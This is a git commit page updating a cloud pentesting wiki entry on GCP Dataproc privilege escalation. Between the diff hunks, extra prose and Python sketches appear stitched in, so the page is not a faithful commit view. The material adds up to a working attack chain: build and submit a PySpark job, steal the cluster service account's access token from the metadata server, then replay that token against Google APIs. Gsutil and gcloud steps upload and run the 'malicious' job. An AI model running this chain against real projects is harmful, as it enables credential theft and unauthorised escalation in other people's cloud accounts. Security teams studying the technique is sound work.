
Commit 44a7712

Author: Mac
Commit message: dataproc privesc update
1 parent 3af4043 commit 44a7712

File tree

1 file changed: +11 −2 lines changed


src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md

Lines changed: 11 additions & 2 deletions
@@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating,
 
 These permissions make both roles highly sensitive and dangerous if misused.
 
+## dataproc.jobs.create & dataproc.clusters.use
+
+The method projects.regions.jobs.submit enables a SA to create a Dataproc job, which can be abused as shown in the example below. Note that to exploit these permissions the SA must also hold the privileges needed to upload the malicious script to the storage bucket (storage.objects.create).
+
+The following permissions were assigned to the SA for the PoC: dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list.
+
 
 ## Privilege Escalation via Metadata Token Leaking
 
-By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can:
+
 
 - Submit a job to a Dataproc cluster.
 
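The added section abuses the projects.regions.jobs.submit method. For readers who want to see what sits behind `gcloud dataproc jobs submit pyspark`, here is a minimal sketch of building the equivalent Dataproc v1 REST request; the project, region, cluster, and bucket names are hypothetical placeholders, and the authenticated POST is left as a comment.

```python
import json

# Dataproc v1 REST endpoint for projects.regions.jobs.submit.
# Project/region values below are hypothetical.
SUBMIT_URL = ("https://dataproc.googleapis.com/v1/projects/{project}"
              "/regions/{region}/jobs:submit")


def build_pyspark_submit_body(cluster_name: str, main_py_uri: str) -> dict:
    """Build the JSON body for submitting a PySpark job to a cluster."""
    return {
        "job": {
            "placement": {"clusterName": cluster_name},
            "pysparkJob": {"mainPythonFileUri": main_py_uri},
        }
    }


if __name__ == "__main__":
    body = build_pyspark_submit_body(
        "poc-cluster", "gs://example-bucket/fetch_metadata_token.py")
    url = SUBMIT_URL.format(project="example-project", region="us-central1")
    # With dataproc.jobs.create, an attacker would send this as:
    # requests.post(url, headers={"Authorization": f"Bearer {token}"}, json=body)
    print(url)
    print(json.dumps(body, indent=2))
```

The body mirrors what `gcloud` assembles from its `--cluster` and positional file-URI arguments.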
@@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc
 
 import requests
 
-# Metadata server URL to fetch the access token
+## Metadata server URL to fetch the access token
 
 ```
 metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
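The diff only shows fragments of the PoC script. A self-contained sketch of the token fetch it performs might look like the following; the metadata URL is the one from the diff, the `Metadata-Flavor: Google` header is required by the GCE metadata server, and the actual network call only works from inside a Dataproc/GCE VM, so it is left commented.

```python
import json
import urllib.request

# Metadata server URL from the PoC script (only resolvable inside a GCE VM).
METADATA_URL = ("http://metadata/computeMetadata/v1/instance/"
                "service-accounts/default/token")


def parse_token_response(raw: str):
    """Extract the access token and its remaining lifetime from the JSON."""
    data = json.loads(raw)
    return data["access_token"], data["expires_in"]


def fetch_default_token():
    """Fetch the default SA token; the metadata server requires this header."""
    req = urllib.request.Request(
        METADATA_URL, headers={"Metadata-Flavor": "Google"})
    with urllib.request.urlopen(req) as resp:
        return parse_token_response(resp.read().decode())


# Inside a Dataproc job this would leak the cluster SA's token, e.g.:
# token, ttl = fetch_default_token()
# print(token, ttl)
```

When submitted as a PySpark job, whatever the script prints lands in the job's driver output, which the attacker can read with dataproc.jobs.get.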
@@ -53,6 +59,9 @@ if __name__ == "__main__":
 ### Steps to exploit
 
 ```
+# Copy the script to the storage bucket
+gsutil cp fetch_metadata_token.py gs://dataproc-poc-bucket-hacktest/fetch_metadata_token.py
+# Submit the malicious job
 gcloud dataproc jobs submit pyspark gs://<bucket-name>/fetch_metadata_token.py \
 --cluster=<cluster-name> \
 --region=<region>
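Once the job output leaks the token, the attacker can replay it from anywhere as a Bearer credential. A hedged sketch of that last step; the helper names are ours, the tokeninfo endpoint is Google's documented way to inspect a token's scopes, and the network calls are left as comments.

```python
import urllib.parse

# Google's token introspection endpoint (reports scopes and expiry).
TOKENINFO_URL = "https://www.googleapis.com/oauth2/v1/tokeninfo"


def bearer_headers(token: str) -> dict:
    """Headers for replaying a leaked token against any GCP REST API."""
    return {"Authorization": f"Bearer {token}"}


def tokeninfo_url(token: str) -> str:
    """URL that reveals which scopes the leaked token carries."""
    return TOKENINFO_URL + "?" + urllib.parse.urlencode(
        {"access_token": token})


# Example replay (requires the `requests` package and a live token):
# requests.get(tokeninfo_url(leaked_token), timeout=10)
# requests.get("https://storage.googleapis.com/storage/v1/b?project=<project>",
#              headers=bearer_headers(leaked_token))
```

Checking tokeninfo first tells the attacker what the cluster SA's token is actually good for before attempting further escalation.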
